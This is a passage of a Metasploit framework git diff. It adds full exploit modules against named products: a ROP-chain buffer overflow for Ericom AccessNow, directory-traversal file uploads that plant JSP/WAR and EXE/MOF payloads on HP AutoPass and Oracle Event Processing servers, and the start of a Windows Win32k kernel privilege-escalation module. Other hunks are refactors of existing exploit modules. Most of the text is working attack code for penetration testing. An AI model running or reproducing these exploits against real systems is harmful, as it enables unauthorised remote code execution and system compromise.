+      'Payload'        =>
+        {
+          'Space'    => 4096,
+          'BadChars' => "\x00\x0d\x0a",
+          'DisableNops' => true,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Targets'        =>
+        [
+          [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
+            {
+              'RopOffset' => 62,
+              'Offset' => 30668,
+              'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Jun 2 2014',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(8080)], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri' => '/AccessNow/start.html'
+    })
+
+    unless res && res.code == 200 && res.headers['Server']
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.headers['Server'] =~ /Ericom AccessNow Server/
+      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
+    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
+      return Exploit::CheckCode::Detected # Ericom AccessNow 3
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit_uri
+    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
+    uri << rand_text(target['RopOffset'])
+    uri << create_rop_chain
+    uri << payload.encoded
+    uri << rand_text(target['Offset'] - uri.length)
+    uri << rand_text(4) # nseh
+    uri << [target.ret].pack("V") # seh
+
+    uri
+  end
+
+  def exploit
+    print_status("#{peer} - Sending malformed request...")
+    send_request_raw({
+      'method'  => 'GET',
+      'uri'     => exploit_uri,
+      'encode'  => false
+    }, 1)
+  end
+
+  def create_rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets =
+      [
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+        0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
+        0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
+        0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]
+        0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]
+        0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]
+        0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xffffffff, # Value to negate, will become 0x00000001
+        0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+        0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]
+        0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)
+        0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]
+        0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]
+        0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xffffffc0, # Value to negate, will become 0x00000040
+        0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+        0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]
+        0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]
+        0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]
+        0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0x90909090, # nop
+        0x1052cfce  # PUSHAD # RETN [AccessNowAccelerator32.dll]
+      ].pack("V*")
+
+    rop_gadgets
+  end
+
+end
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
new file mode 100644
index 0000000000..db98e83681
--- /dev/null
+++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'HP AutoPass License Server File Upload',
+      'Description' => %q{
+        This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
+        weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
+        authentication in the CommunicationServlet component. Seond, it's possible to abuse a
+        directory traversal when uploading files thorough the same component, allowing to upload
+        an arbitrary payload embedded in a JSP. The module has been tested successfully on
+        HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2013-6221'],
+          ['ZDI', '14-195'],
+          ['BID', '67989'],
+          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125']
+        ],
+      'Privileged'  => true,
+      'Platform'    => %w{ java },
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          ['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 10 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(5814),
+        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
+        OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
+        OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
+      ], self.class)
+  end
+
+
+  def check
+    check_code = Exploit::CheckCode::Safe
+
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
+        'method' => 'POST'
+      })
+
+    unless res
+      check_code = Exploit::CheckCode::Unknown
+    end
+
+    if res && res.code == 500 &&
+       res.body.to_s.include?("HP AutoPass License Server") &&
+       res.body.to_s.include?("java.lang.NullPointerException") &&
+       res.body.to_s.include?("com.hp.autopass")
+
+      check_code = Exploit::CheckCode::Detected
+    end
+
+    check_code
+  end
+
+  def exploit
+    app_base = rand_text_alphanumeric(4+rand(32-4))
+    war = payload.encoded_war({ :app_name => app_base }).to_s
+    war_filename = "#{app_base}.war"
+
+    # By default, the working directory when executing the JSP is:
+    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
+    # The war should be dropped to the next location to autodeploy:
+    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps
+    war_traversal = webapps_traversal
+    war_traversal << "webapps/#{war_filename}"
+    dropper = jsp_drop_bin(war, war_traversal)
+    dropper_filename = rand_text_alpha(8) + ".jsp"
+
+    print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...")
+    # The JSP, by default, is uploaded to:
+    # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\
+    # In order to execute it, through the AutoPass application we would like to drop it here:
+    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
+    dropper_traversal = install_traversal
+    dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
+    res = upload_file(dropper_traversal, dropper)
+
+    register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
+    register_files_for_cleanup("#{webapps_traversal}webapps/#{war_filename}")
+
+    unless res && res.code == 500 &&
+           res.body.to_s.include?("HP AutoPass License Server") &&
+           res.body.to_s.include?("java.lang.NullPointerException") &&
+           res.body.to_s.include?("com.hp.autopass")
+
+      print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...")
+    end
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, "scripts", dropper_filename),
+      'method' => 'GET'
+    })
+
+    unless res and res.code == 200
+      print_error("#{peer} - Unexpected response after executing the dropper...")
+    end
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi(
+        {
+          'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"),
+          'method' => 'GET'
+        })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+  end
+
+  def webapps_traversal
+    "../" * datastore['WEBAPPS_DEPTH']
+  end
+
+  def install_traversal
+    "/.." * datastore['INSTALL_DEPTH']
+  end
+
+  # Using a JSP dropper because the vulnerability doesn't allow to upload
+  # 'binary' files, so a WAR can't be uploaded directly.
+  def jsp_drop_bin(bin_data, output_file)
+    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+    jspraw << %Q|<%\n|
+    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+    jspraw << %Q|int numbytes = data.length();\n|
+
+    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+    jspraw << %Q|{\n|
+    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
+    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
+    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
+    jspraw << %Q|  comb <<= 4;\n|
+    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
+    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
+    jspraw << %Q|}\n|
+
+    jspraw << %Q|outputstream.write(bytes);\n|
+    jspraw << %Q|outputstream.close();\n|
+    jspraw << %Q|%>\n|
+
+    jspraw
+  end
+
+  def upload_file(file_name, contents)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadedFile\"; filename=\"#{file_name}\"")
+
+    data = post_data.to_s
+
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
+        'method' => 'POST',
+        'data'   => data,
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+      })
+
+    res
+  end
+
+end
diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb
index 96f1cb3d2a..14471183de 100644
--- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb
@@ -83,9 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Trying target #{target.name}...")
 
     send_request_cgi({
-      'uri'		  => "/OvCgi/ovalarm.exe?OVABverbose=1",
+      'uri'		  => '/OvCgi/ovalarm.exe',
       'method'	  => "GET",
-      'headers'  => { 'Accept-Language' => sploit }
+      'headers'  => {
+        'Accept-Language' => sploit
+      },
+      'vars_get' => {
+        'OVABverbose' => '1'
+      }
     }, 3)
 
     handler
diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
index 8874861052..d3507767ec 100644
--- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
+++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'  => true,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86,
+      'CmdStagerFlavor' => 'vbs',
       'Targets'     =>
         [
           [ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ]
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DefaultOptions'  =>
         {
-          'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
+          'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
         },
       'DisclosureDate' => 'Jul 29 2013'))
 
diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb
index 29f338de3f..78bb7ccc5c 100644
--- a/modules/exploits/windows/http/mcafee_epolicy_source.rb
+++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'  =>
         [
-          'muts <muts [at] remote-exploit.org>',
+          'muts <muts[at]remote-exploit.org>',
           'xbxice[at]yahoo.com',
           'hdm',
           'patrick' # MSF3 rewrite, ePO v2.5.1 target
diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb
new file mode 100644
index 0000000000..2fdaf9b065
--- /dev/null
+++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload',
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability in Oracle Event Processing
+        11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be
+        abused to upload a malicious file onto an arbitrary location due to a directory traversal
+        flaw, and compromise the server. By default Oracle Event Processing uses a Jetty
+        Application Server without JSP support, which limits the attack to WbemExec. The current
+        WbemExec technique only requires arbitrary write to the file system, but at the moment the
+        module only supports Windows 2003 SP2 or older.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-2424'],
+          ['ZDI', '14-106'],
+          ['BID', '66871'],
+          ['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html']
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 5
+        },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 21 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9002),
+        # By default, uploads are stored in:
+        # C:\Oracle\Middleware\user_projects\domains\<DOMAIN>\defaultserver\upload\
+        OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+      ], self.class)
+  end
+
+  def upload(file_name, contents)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"")
+    post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"")
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'uri'    => '/wlevs/visualizer/upload',
+      'method' => 'POST',
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data'   => data
+    })
+
+    res
+  end
+
+  def traversal
+    "../" * datastore['DEPTH']
+  end
+
+  def exploit
+    print_status("#{peer} - Generating payload and mof file...")
+    mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
+    exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
+    exe_content = generate_payload_exe
+    mof_content = generate_mof(mof_name, exe_name)
+
+    print_status("#{peer} - Uploading the exe payload #{exe_name}...")
+    exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
+    res = upload(exe_traversal, exe_content)
+
+    unless res && res.code == 200 && res.body.blank?
+      print_error("#{peer} - Unexpected answer, trying anyway...")
+    end
+    register_file_for_cleanup(exe_name)
+
+    print_status("#{peer} - Uploading the MOF file #{mof_name}")
+    mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
+    upload(mof_traversal, mof_content)
+    register_file_for_cleanup("wbem/mof/good/#{mof_name}")
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => '/ohw/help/state',
+      'method' => 'GET',
+      'vars_get'  => {
+        'navSetId' => 'cepvi',
+        'navId' => '0',
+        'destination' => ''
+      }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
+        return Exploit::CheckCode::Detected
+      elsif res.body.to_s.include?("Oracle Event Processing 12")
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+end
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 1590d1ba62..5a187fddaf 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
+      'CmdStagerFlavor' => 'tftp',
       'Privileged' => true,
       'Platform' => 'win',
       'DisclosureDate' => 'Jul 13 2010',
@@ -53,11 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
@@ -74,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'POST',
       }, 5)
 
-    if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
-      sessionid = res.headers['Set-Cookie'].split(';')[0]
+    if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
+      sessionid = res.get_cookies
 
       data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
 
diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb
index bd4cf1a1f4..f04f6110b1 100644
--- a/modules/exploits/windows/http/sambar6_search_results.rb
+++ b/modules/exploits/windows/http/sambar6_search_results.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author' 	=> 	[
           'hdm',
-          'Andrew Griffiths <andrewg [at] felinemenace.org>',
+          'Andrew Griffiths <andrewg[at]felinemenace.org>',
           'patrick', # msf3 port
             ],
       'Arch'		=> [ ARCH_X86 ],
diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
index 21ff043ae7..0a98a50b74 100644
--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit
             }
           ]
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultTarget'  => 0,
       'Privileged'     => false
       ))
diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb
index 98af060d72..6e67e66cb2 100644
--- a/modules/exploits/windows/http/shttpd_post.rb
+++ b/modules/exploits/windows/http/shttpd_post.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
         handling of POST requests. Based on an original exploit by skOd
         but using a different method found by hdm.
       },
-      'Author'         => [ 'LMH <lmh [at] info-pull.com>', 'hdm', 'skOd'],
+      'Author'         => [ 'LMH <lmh[at]info-pull.com>', 'hdm', 'skOd'],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
index d583cd0285..53660c9e7e 100644
--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Pick up the cookie, example:
     # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB
-    if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/
-      cookie = "JSESSIONID=#{$1}"
+    if res and res.get_cookies =~ /JSESSIONID=(\w+);/
+      cookie = res.get_cookies
     else
       print_error("Unable to get a session ID")
       return
diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb
index 730b89f9a9..0f6fa1e789 100644
--- a/modules/exploits/windows/http/sybase_easerver.rb
+++ b/modules/exploits/windows/http/sybase_easerver.rb
@@ -68,10 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Sending the request
     res = send_request_cgi({
-      'uri'          => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash,
-      'method'       => 'GET',
-      'headers'      => {
-        'Accept'	=> '*/*',
+      'uri'       => normalize_uri(datastore['DIR'], 'Login.jsp'),
+      'method'    => 'GET',
+      'headers'   => {
+        'Accept' => '*/*',
+      },
+      'vars_get'  => {
+        crash => nil
       }
     }, 5)
 
diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb
index 9d675fec6a..728544b5bc 100644
--- a/modules/exploits/windows/http/zenworks_uploadservlet.rb
+++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb
@@ -66,16 +66,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
     war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s
 
-    res = send_request_cgi(
-      {
-        'uri'    => "/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war",
-        'method' => 'POST',
-        'data'   => war_data,
-        'headers' =>
-          {
-            'Content-Type' => 'application/octet-stream',
-          }
-      })
+    res = send_request_cgi({
+      'uri'       => '/zenworks/UploadServlet',
+      'method'    => 'POST',
+      'data'      => war_data,
+      'headers'   => {
+        'Content-Type' => 'application/octet-stream',
+      },
+      'vars_get'  => {
+        'filename' => "../../webapps/#{app_base}.war"
+      }
+    })
 
     print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")
 
diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
index e613bfaf7d..3872890e0e 100644
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # NOTE: This cannot be an HttpClient module since the response from the server
   # is not a valid HttpResponse
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', { } ]
         ],
+      'CmdStagerFlavor' => 'tftp',
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'May 15 2001'
     ))
@@ -191,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Use the CMD stager to get a payload running
-    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+    execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname})
 
     # Save these file names for later deletion
     @exe_cmd_copy = exe_fname
diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb
index 7b517fcc5b..7b5b251016 100644
--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
 
   def initialize
     super(
@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
           # w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
           [ 'Automatic', { } ],
         ],
+      'CmdStagerFlavor' => 'tftp',
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 17 1998'
     )
diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
index 86a9f65f29..94e5021aa3 100644
--- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
+++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         user-supplied data prior to copying it to a fixed size memory buffer.
         Credit to Tim Taylor for discover the vulnerability.
       },
-      'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
+      'Author'         => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],
       'License'        => BSD_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
index 6ae987f891..8d286bbfc3 100644
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local
         technique to drop only the DLL payload binary instead of three seperate
         binaries in the standard technique. However, it requires the correct
         architecture to be selected, (use x64 for SYSWOW64 systems also).
+        If specifying EXE::Custom your DLL should call ExitProcess() after starting
+        your payload in a seperate process.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [
diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb
new file mode 100644
index 0000000000..daab80e39a
--- /dev/null
+++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
+      'Description'    => %q{
+        This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.
+        The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
+        This allows any unprivileged process to freely migrate to winlogon.exe, achieving
+        privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.
+        NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+           'Nils', #Original Exploit
+           'Jon', #Original Exploit
+           'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
+           'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP0/SP1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2013-1300' ],
+          [ 'MSB', 'MS13-053' ],
+          [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
+        ],
+      'DisclosureDate' => 'Dec 01 2013',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check
+    os = sysinfo["OS"]
+    unless (os =~ /windows/i)
+      return Exploit::CheckCode::Unknown
+    end
+
